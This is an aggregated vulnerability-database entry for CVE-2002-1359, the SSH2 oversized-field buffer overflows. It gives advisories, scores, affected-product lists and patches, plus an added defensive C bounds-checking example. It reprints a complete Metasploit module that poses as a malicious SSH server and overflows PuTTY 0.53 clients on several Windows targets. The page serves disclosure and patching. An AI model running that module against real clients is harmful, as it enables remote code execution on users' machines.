CVE-2002-1359
CVSS 10.0
Published: 2002-12-23 00:00:00
Revised: 2009-03-04 00:14:08

[Original] Multiple SSH2 servers and clients do not properly handle large packets or large fields, which may allow remote attackers to cause a denial of service or possibly execute arbitrary code via buffer overflow attacks, as demonstrated by the SSHredder SSH protocol test suite.


[CNNVD] Multiple SSH2 server/client oversized-field remote buffer overflow vulnerability (CNNVD-200212-041)

The SSH protocol establishes encrypted communication between a client and a server. Rapid7 developed the SSHredder test tool, which exercises connection initialization, key exchange, and the negotiation of the SSH transport-layer cipher fields in detail.
During this testing, multiple SSH2 servers and clients were found to mishandle invalid or incorrect lengths for some strings (for example the greeting line and all strings in the KEXINIT packet); a remote attacker can exploit this to cause a denial of service or possibly execute arbitrary code with the privileges of the process.
No further details of the vulnerability are available at present.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: LOW [no special access conditions are required to exploit]
Access vector: NETWORK [the attacker does not need intranet or local access]
Authentication: NONE [no authentication is required to exploit]

- CWE (weakness category)

CWE-20 [Improper Input Validation]

- CPE (affected platforms and products)

cpe:/a:putty:putty:0.49
cpe:/o:cisco:ios:12.2 (Cisco IOS 12.2)
cpe:/o:cisco:ios:12.0s (Cisco IOS 12.0S)
cpe:/o:cisco:ios:12.1e (Cisco IOS 12.1E)
cpe:/o:cisco:ios:12.1ea (Cisco IOS 12.1EA)
cpe:/o:cisco:ios:12.1t (Cisco IOS 12.1T)
cpe:/a:winscp:winscp:2.0.0
cpe:/a:putty:putty:0.48
cpe:/o:cisco:ios:12.2s (Cisco IOS 12.2S)
cpe:/a:fissh:ssh_client:1.0a_for_windows
cpe:/a:intersoft:securenetterm:5.4.1
cpe:/a:pragma_systems:secureshell:2.0
cpe:/a:netcomposite:shellguard_ssh:3.4.6
cpe:/o:cisco:ios:12.2t (Cisco IOS 12.2T)
cpe:/a:putty:putty:0.53
cpe:/o:cisco:ios:12.0st (Cisco IOS 12.0ST)

- OVAL (technical details for detection)

oval:org.mitre.oval:def:5848 Multiple Vendors SSH2 "buffer overflow" Vulnerability
*OVAL describes the method for detecting this vulnerability in detail; the related OVAL definition carries further technical details on detecting it.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1359
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1359
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-041
(official data source) CNNVD

- Other links and resources

http://www.cert.org/advisories/CA-2002-36.html
(VENDOR_ADVISORY)  CERT  CA-2002-36
http://xforce.iss.net/xforce/xfdb/10870
(UNKNOWN)  XF  ssh-transport-multiple-bo(10870)
http://www.securityfocus.com/bid/6407
(UNKNOWN)  BID  6407
http://securitytracker.com/id?1005813
(UNKNOWN)  SECTRACK  1005813
http://securitytracker.com/id?1005812
(UNKNOWN)  SECTRACK  1005812
http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0110.html
(VENDOR_ADVISORY)  VULNWATCH  20021216 R7-0009: Vulnerabilities in SSH2 Implementations from Multiple Vendors

- Vulnerability information

Multiple SSH2 server/client oversized-field remote buffer overflow vulnerability
Critical    Input validation
2002-12-23 00:00:00    2009-03-04 00:00:00
Remote

- Advisories and patches

Temporary workaround:
If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* Use a firewall or other packet-filtering system to restrict access to the SSH server to trusted hosts and networks.
* SSH clients can reduce the risk by connecting only to trusted servers.
Vendor patches:
F-Secure
--------
The vendor has not yet released a patch or upgrade; users of this software are advised to watch the vendor's home page for the latest version:

http://www.f-secure.com

InterSoft
---------
The vendor has not yet released a patch or upgrade; users of this software are advised to watch the vendor's home page for the latest version:

http://www.securenetterm.com/

SSH Communications Security
---------------------------
The vendor has not yet released a patch or upgrade; users of this software are advised to watch the vendor's home page for the latest version:

http://www.ssh.com/

FiSSH
-----
The vendor has not yet released a patch or upgrade; users of this software are advised to watch the vendor's home page for the latest version:

http://web.mit.edu/ssh/FiSSH/

NetComposite
------------
The vendor has not yet released a patch or upgrade; users of this software are advised to watch the vendor's home page for the latest version:

http://telneat.lipetsk.ru/

Pragma Systems, Inc.
--------------------
The vendor has not yet released a patch or upgrade; users of this software are advised to watch the vendor's home page for the latest version:

http://www.pragmasys.com/

PuTTY
-----
The vendor has not yet released a patch or upgrade; users of this software are advised to watch the vendor's home page for the latest version:

http://www.chiark.greenend.org.uk/~sgtatham/putty/

WinSCP
------
The vendor has not yet released a patch or upgrade; users of this software are advised to watch the vendor's home page for the latest version:

http://winscp.vse.cz/eng/

- Vulnerability information (EDB 16463)

PuTTy.exe <= v0.53 Buffer Overflow (EDBID:16463)
windows remote
2010-06-15 Verified
0 metasploit
N/A
##
# $Id: putty_msg_debug.rb 9525 2010-06-15 07:18:08Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::TcpServer

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'PuTTy.exe <= v0.53 Buffer Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in the PuTTY SSH client that is triggered
				through a validation error in SSH.c.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9525 $',
			'References'     =>
				[
					[ 'CVE', '2002-1359' ],
					[ 'OSVDB', '8044'],
					[ 'URL', 'http://www.rapid7.com/advisories/R7-0009.html' ],
					[ 'BID', '6407'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00",
					'MaxNops'  => 0,
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP4 English', { 'Ret' => 0x77e14c29 } ],
					[ 'Windows XP SP2 English',   { 'Ret' => 0x76b43ae0 } ],
					[ 'Windows 2003 SP1 English', { 'Ret' => 0x76aa679b } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Dec 16 2002',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptPort.new('SRVPORT', [ true, "The SSH daemon port to listen on", 22 ])
			], self.class)
	end

	def on_client_connect(client)
		return if ((p = regenerate_payload(client)) == nil)

		buffer =
			"SSH-2.0-OpenSSH_3.6.1p2\r\n" +
			"\x00\x00\x4e\xec\x01\x14" +
			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
			"\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde" +
			(((((rand_text_alphanumeric(64)) + ",") * 30) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde") * 2) +
			(((rand_text_alphanumeric(64)) + ",") * 2) + rand_text_alphanumeric(21) +
			[target.ret].pack('V') + make_nops(10) + p.encoded +
			(((rand_text_alphanumeric(64)) + ",") * 15) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde" +
			(((rand_text_alphanumeric(64)) + ",") * 30) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde" +
			(((rand_text_alphanumeric(64)) + ",") * 21) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde" +
			(((((rand_text_alphanumeric(64)) + ",") * 30) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde") * 6) +
			"\x00\x00\x00\x00\x00\x00"

		print_status("Sending #{buffer.length} bytes to #{client.getpeername}:#{client.peerport}...")

		client.put(buffer)
		handler

		service.close_client(client)
	end

end
		

- Vulnerability information (PacketStorm F83008)

PuTTy.exe <= v0.53 Buffer Overflow (PacketStormID:F83008)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow
CVE-2002-1359

This Metasploit module exploits a buffer overflow in the PuTTY SSH client that is triggered through a validation error in SSH.c.


- Vulnerability information (OSVDB 8044)

8044
Multiple Vendor SSH2 Server/Client Large Field Overflows
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS, Upgrade
Exploit Public

- Vulnerability description

Multiple buffer overflows exist in multiple SSH implementations. Both servers and clients fail to validate large packets or fields resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2002-12-16 Unknown
Unknown Unknown

- Solution

Refer to vendor advisory for possible solutions.

- Vulnerability information (BID 6407)

Multiple Vendor SSH2 Implementation Buffer Overflow Vulnerabilities
Boundary Condition Error 6407
Yes No
2002-12-16 12:00:00 2009-07-11 07:16:00
Discovery of this vulnerability is credited to Rapid 7, Inc.

- Affected software versions

WinSCP WinSCP 2.0 .0
Simon Tatham PuTTY 0.53
Simon Tatham PuTTY 0.49
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
Simon Tatham PuTTY 0.48
Pragma Systems SecureShell 2.0
NetComposite Shellguard SSH 3.4.6
InterSoft SecureNetTerm 5.4.1
FiSSH SSH Client For Windows 1.0 A
Cisco WebNS 7.10
Cisco WebNS 7.1 0.2.06
+ Cisco CSS11000 Content Services Switch
+ Cisco CSS11050 Content Services Switch
+ Cisco CSS11150 Content Services Switch
+ Cisco CSS11501 Content Services Switch
+ Cisco CSS11503 Content Services Switch
+ Cisco CSS11506 Content Services Switch
+ Cisco CSS11800 Content Services Switch
Cisco WebNS 7.1 0.1.02
+ Cisco CSS11000 Content Services Switch
+ Cisco CSS11050 Content Services Switch
+ Cisco CSS11150 Content Services Switch
+ Cisco CSS11501 Content Services Switch
+ Cisco CSS11503 Content Services Switch
+ Cisco CSS11506 Content Services Switch
+ Cisco CSS11800 Content Services Switch
Cisco WebNS 5.20
Cisco WebNS 5.10
Cisco WebNS 5.1 0.0.10
+ Cisco CSS11000 Content Services Switch
+ Cisco CSS11050 Content Services Switch
+ Cisco CSS11150 Content Services Switch
+ Cisco CSS11501 Content Services Switch
+ Cisco CSS11503 Content Services Switch
+ Cisco CSS11506 Content Services Switch
+ Cisco CSS11800 Content Services Switch
Cisco PIX Firewall 6.2.2 .111
Cisco PIX Firewall 6.2.2
Cisco PIX Firewall 6.2.1
Cisco PIX Firewall 6.2 (2)
Cisco PIX Firewall 6.2 (1)
Cisco PIX Firewall 6.2
Cisco PIX Firewall 6.1.4
Cisco PIX Firewall 6.1.3
Cisco PIX Firewall 6.1 (4)
Cisco PIX Firewall 6.1 (3)
Cisco PIX Firewall 6.1 (2)
Cisco PIX Firewall 6.1 (1)
Cisco PIX Firewall 6.1
Cisco PIX Firewall 6.0.4
Cisco PIX Firewall 6.0.3
Cisco PIX Firewall 6.0 (4)
Cisco PIX Firewall 6.0 (2)
Cisco PIX Firewall 6.0 (1)
Cisco PIX Firewall 6.0
Cisco ONS 15600 1.3 (0)
Cisco ONS 15600 1.1 (1)
Cisco ONS 15600 1.1 (0)
Cisco ONS 15600 1.1
Cisco ONS 15600 1.0
Cisco ONS 15454SDH 4.6 (1)
Cisco ONS 15454SDH 4.6 (0)
Cisco ONS 15454SDH 4.5
Cisco ONS 15454SDH 4.1 (3)
Cisco ONS 15454SDH 4.1 (2)
Cisco ONS 15454SDH 4.1 (1)
Cisco ONS 15454SDH 4.1 (0)
Cisco ONS 15454SDH 4.0 (2)
Cisco ONS 15454SDH 4.0 (1)
Cisco ONS 15454SDH 4.0 (0)
Cisco ONS 15454SDH 4.0
Cisco ONS 15454SDH 3.4
Cisco ONS 15454SDH 3.3
Cisco ONS 15454SDH 3.2
Cisco ONS 15454SDH 3.1
Cisco ONS 15454SDH 2.3 (5)
Cisco ONS 15454E Optical Transport Platform 0
Cisco ONS 15454 Optical Transport Platform 4.14
Cisco ONS 15454 Optical Transport Platform 4.6 (1)
Cisco ONS 15454 Optical Transport Platform 4.6 (0)
Cisco ONS 15454 Optical Transport Platform 4.5
Cisco ONS 15454 Optical Transport Platform 4.1 (3)
Cisco ONS 15454 Optical Transport Platform 4.1 (2)
Cisco ONS 15454 Optical Transport Platform 4.1 (1)
Cisco ONS 15454 Optical Transport Platform 4.1 (0)
Cisco ONS 15454 Optical Transport Platform 4.1
Cisco ONS 15454 Optical Transport Platform 4.0 (2)
Cisco ONS 15454 Optical Transport Platform 4.0 (1)
Cisco ONS 15454 Optical Transport Platform 4.0
Cisco ONS 15454 Optical Transport Platform 3.4
Cisco ONS 15454 Optical Transport Platform 3.3
Cisco ONS 15454 Optical Transport Platform 3.2 .0
Cisco ONS 15454 Optical Transport Platform 3.1 .0
Cisco ONS 15454 Optical Transport Platform 3.0
Cisco ONS 15454 Optical Transport Platform 2.3 (5)
Cisco ONS 15454 IOS-Based Blades
Cisco ONS 15327 Metro Edge Optical Transport Platform
Cisco ONS 15327 4.14
Cisco ONS 15327 4.6 (1)
Cisco ONS 15327 4.6 (0)
Cisco ONS 15327 4.1 (3)
Cisco ONS 15327 4.1 (2)
Cisco ONS 15327 4.1 (1)
Cisco ONS 15327 4.1 (0)
Cisco ONS 15327 4.0 (2)
Cisco ONS 15327 4.0 (1)
Cisco ONS 15327 4.0
Cisco ONS 15327 3.4
Cisco ONS 15327 3.3
Cisco ONS 15327 3.2
Cisco ONS 15327 3.1
Cisco ONS 15327 3.0
Cisco IOS 12.2T
Cisco IOS 12.2S
Cisco IOS 12.2(1)T
Cisco IOS 12.2(1)S
Cisco IOS 12.2(1)
Cisco IOS 12.2
Cisco IOS 12.1T
Cisco IOS 12.1EA
Cisco IOS 12.1E
Cisco IOS 12.1(5a)E
Cisco IOS 12.1(1)T
Cisco IOS 12.0ST
Cisco IOS 12.0S
Cisco IOS 12.0(5)S
Cisco IOS 12.0(16)ST
Cisco Firewall Services Module (FWSM) 2.1 (0.208)
Cisco Aironet Firmware 12.0 1T
Cisco Aironet Firmware 12.0 0T

- Unaffected software versions

Simon Tatham PuTTY 0.53 b
Pragma Systems SecureShell 3.0
OpenSSH OpenSSH 3.5
OpenSSH OpenSSH 3.4 p1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Conectiva Linux Enterprise Edition 1.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ FreeBSD FreeBSD 5.0
+ FreeBSD FreeBSD 4.7 -RELEASE
+ FreeBSD FreeBSD 4.7
+ IBM AIX 5.1 L
+ IBM AIX 4.3.3
+ Immunix Immunix OS 7+
+ RedHat Linux 8.0
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.0
+ Slackware Linux 8.1
OpenSSH OpenSSH 3.4
OpenSSH OpenSSH 3.3 p1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
OpenSSH OpenSSH 3.3
+ Openwall Openwall GNU/*/Linux (Owl)-current
OpenSSH OpenSSH 3.2.3 p1
OpenSSH OpenSSH 3.2.2 p1
+ Apple Mac OS X 10.1.5
+ Apple Mac OS X 10.1.4
+ Apple Mac OS X 10.1.3
+ Apple Mac OS X 10.1.2
+ Apple Mac OS X 10.1.1
+ Apple Mac OS X 10.1
+ Apple Mac OS X 10.1
+ Apple Mac OS X 10.0.4
+ Apple Mac OS X 10.0.3
+ Apple Mac OS X 10.0.2
+ Apple Mac OS X 10.0.1
+ Apple Mac OS X 10.0
OpenSSH OpenSSH 3.2
+ OpenBSD OpenBSD 3.1
OpenSSH OpenSSH 3.1 p1
+ Juniper Networks NetScreen-IDP 10 3.0 r2
+ Juniper Networks NetScreen-IDP 10 3.0 r1
+ Juniper Networks NetScreen-IDP 10 3.0
+ Juniper Networks NetScreen-IDP 100 3.0 r2
+ Juniper Networks NetScreen-IDP 100 3.0 r1
+ Juniper Networks NetScreen-IDP 100 3.0
+ Juniper Networks NetScreen-IDP 1000 3.0 r2
+ Juniper Networks NetScreen-IDP 1000 3.0 r1
+ Juniper Networks NetScreen-IDP 1000 3.0
+ Juniper Networks NetScreen-IDP 500 3.0 r2
+ Juniper Networks NetScreen-IDP 500 3.0 r1
+ Juniper Networks NetScreen-IDP 500 3.0
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 7.3
+ RedHat Linux 7.2
+ RedHat Linux 7.1
+ RedHat Linux for iSeries 7.1
+ RedHat Linux for pSeries 7.1
+ Slackware Linux 8.1
+ Sun Linux 5.0.7
+ Sun Solaris 9
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
OpenSSH OpenSSH 3.1
OpenSSH OpenSSH 3.0.2 p1
+ Guardian Digital Engarde Secure Linux 1.0.1
+ HP VirtualVault 4.6
OpenSSH OpenSSH 3.0.2
- Debian Linux 3.0
+ FreeBSD FreeBSD 4.5 -STABLEpre2002-03-07
+ FreeBSD FreeBSD 4.5 -RELEASE
+ OpenPKG OpenPKG 1.0
+ Openwall Openwall GNU/*/Linux 0.1 -stable
+ S.u.S.E. Linux 8.0
OpenSSH OpenSSH 3.0.1 p1
OpenSSH OpenSSH 3.0.1
OpenSSH OpenSSH 3.0 p1
OpenSSH OpenSSH 3.0
LSH LSH 1.5
InterSoft SecureNetTerm 5.4.2
Cisco WebNS 7.10 .0.06s
Cisco WebNS 5.20 .0.06s
Cisco PIX Firewall 6.3 (1)
Cisco PIX Firewall 6.2 (3)
Cisco PIX Firewall 6.1 (5)
Cisco PIX Firewall 6.0 (4.101)
Cisco IOS 12.2(14)S
Cisco IOS 12.2(13a)
Cisco IOS 12.2(13)T1
Cisco IOS 12.2(12b)
Cisco IOS 12.2(11)T3
Cisco IOS 12.1(14)E1
Cisco IOS 12.1(13)EA1c
Cisco IOS 12.1(13)E3
Cisco IOS 12.0(23)S2
Cisco IOS 12.0(22)S4
Cisco IOS 12.0(21)ST6
Cisco IOS 12.0(21)S6
Cisco IOS 12.0(20)ST7
Cisco Aironet Firmware 12.0 1T1
BitVise WinSSHD 3.5

- Discussion

Multiple vendor SSH2 implementations are reported to be prone to buffer overflows. These buffer overflows are alleged to be exploitable prior to authentication.

These conditions were discovered during tests of the initialization, key exchange, and negotiation phases (KEX, KEXINIT) of a SSH2 transaction between client and server. These issues are known to affect various client and server implementations of the protocol.

Successful exploitation will enable remote attackers to cause execution of code in the security context of the specific server and client implementations.

Further details about this vulnerability are currently unknown. This BID will be updated as more information becomes available. This vulnerability was originally described in BugTraq ID 6397.
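Added example, not from the advisory or from any vendor listed here: a bounds-checked reader for the SSH2 KEXINIT packet described above, assuming the RFC 4253 packet layout and two constructed implementation limits (MAX_PACKET_LEN, MAX_NAMELIST_LEN). It rejects a name-list whose declared length runs past the bytes actually received, the large-field case this entry describes, instead of copying it into a buffer.

```c
/* Added example; not code from the advisory or from any vendor listed here.
 * Bounds-checked reader for an SSH2 binary packet carrying KEXINIT
 * (layout per RFC 4253, sections 6 and 7.1). Every declared length is
 * checked against the bytes actually present before it is used: the
 * validation whose absence this entry classifies as CWE-20. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#define SSH_MSG_KEXINIT   20
#define KEXINIT_NAMELISTS 10
/* Assumed implementation limits, not values from the advisory. */
#define MAX_PACKET_LEN    35000u
#define MAX_NAMELIST_LEN  1024u

static uint32_t get_u32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}
static void put_u32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);  p[3] = (uint8_t)v;
}
/* Returns 0 for a well-formed KEXINIT, or a negative code naming the check
 * that failed. Never reads past buf + len, whatever the packet claims. */
int check_kexinit(const uint8_t *buf, size_t len) {
    if (len < 5) return -1;                        /* packet_length + padding_length */
    uint32_t packet_len = get_u32(buf);
    uint8_t  padding    = buf[4];
    if (packet_len > MAX_PACKET_LEN) return -2;    /* more than we ever allocate */
    if ((size_t)packet_len + 4 > len) return -3;   /* claims bytes that were never received */
    if (padding < 4 || (size_t)padding + 1 >= packet_len) return -4; /* no room for payload */
    size_t payload_end = 4 + packet_len - padding; /* exclusive; MAC is not covered here */
    size_t off = 5;
    if (buf[off] != SSH_MSG_KEXINIT) return -5;
    off += 1 + 16;                                 /* message type + 16-byte cookie */
    if (off > payload_end) return -6;
    for (int i = 0; i < KEXINIT_NAMELISTS; i++) {
        if (payload_end - off < 4) return -7;      /* no room for a length field */
        uint32_t nl = get_u32(buf + off);
        off += 4;
        if (nl > payload_end - off) return -8;     /* the large-field case: points past payload */
        if (nl > MAX_NAMELIST_LEN) return -9;      /* policy cap even when the bytes exist */
        off += nl;                                 /* safe: bounded by payload_end */
    }
    return (payload_end - off == 5) ? 0 : -10;     /* first_kex_packet_follows + reserved */
}

/* Constructed sample: a minimal well-formed KEXINIT with ten empty name-lists
 * and a zero cookie. Returns bytes written, 0 if cap is too small. */
size_t build_minimal_kexinit(uint8_t *out, size_t cap) {
    const size_t payload = 1 + 16 + KEXINIT_NAMELISTS * 4 + 1 + 4;   /* 62 bytes */
    uint8_t padding = (uint8_t)(8 - (5 + payload) % 8);             /* block-align, >= 4 */
    if (padding < 4) padding += 8;
    uint32_t packet_len = (uint32_t)(1 + payload + padding);
    size_t total = 4 + packet_len;
    if (cap < total) return 0;
    memset(out, 0, total);
    put_u32(out, packet_len);
    out[4] = padding;
    out[5] = SSH_MSG_KEXINIT;
    return total;
}

int main(void) {
    uint8_t pkt[128];
    size_t n = build_minimal_kexinit(pkt, sizeof pkt);
    printf("well-formed: %d\n", check_kexinit(pkt, n));
    put_u32(pkt + 22, 0x07de);   /* first name-list now claims 2014 bytes in a 72-byte packet */
    printf("oversized name-list: %d\n", check_kexinit(pkt, n));
    return 0;
}
```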

- Exploit

The SSHredder test suite, provided by Rapid 7, is available from the following location:

http://www.rapid7.com/perl/DownloadRequest.pl?PackageChoice=666

Proof-of-concept code has been published. The following program will act as a malicious server to exploit vulnerable 'putty' clients.

- Solution

Cray Inc. supports an OpenSSH implementation via the Cray Open Software (COS) package. COS 3.3 will reportedly address these issues and is expected to be released at the end of December 2002. Those affected by the issues may also contact Cray Inc. to obtain a fixed version of the OpenSSH implementation that will be made available in COS 3.3.

SSH Secure Shell products do not appear to be prone to any of the vulnerabilities that have been reported.

F-Secure SSH products are not vulnerable to arbitrary code execution or denial of service attacks via exploitation of these issues.

Some versions of Cisco IOS support SSH, though it is not enabled by default. Fixed versions have been made available. See the referenced advisory for more information.

Cisco has released an updated advisory. Cisco Aironet software rebuild version 12.01T1 is not vulnerable to this issue. This software will be available in the near future and will be available for download from the Software Center.

http://www.cisco.com/tacpage/sw-center/sw-wireless.shtml

Cisco has released Content Switching Software updates. WebNS 5.20.0.06s and 7.10.0.06s address the issues. These updates can be found at the following location:

http://www.cisco.com/tacpage/sw-center/sw-content.shtml

Cisco has updated their advisory to include Cisco PIX Firewall as being vulnerable. PIX Firewall has been fixed in software versions 6.0(4.101), 6.1(5), 6.2(3) and 6.3(1).

Cisco has released an updated advisory to outline vulnerable Cisco ONS products and fixes. Please see the referenced advisory for more information.

The following vendors have provided fixes:

Cisco IOS 12.2T
Cisco IOS 12.2S
Cisco IOS 12.0ST
Cisco IOS 12.2
Cisco IOS 12.1E
Cisco IOS 12.0S
Simon Tatham PuTTY 0.49
Simon Tatham PuTTY 0.53
Pragma Systems SecureShell 2.0
InterSoft SecureNetTerm 5.4.1
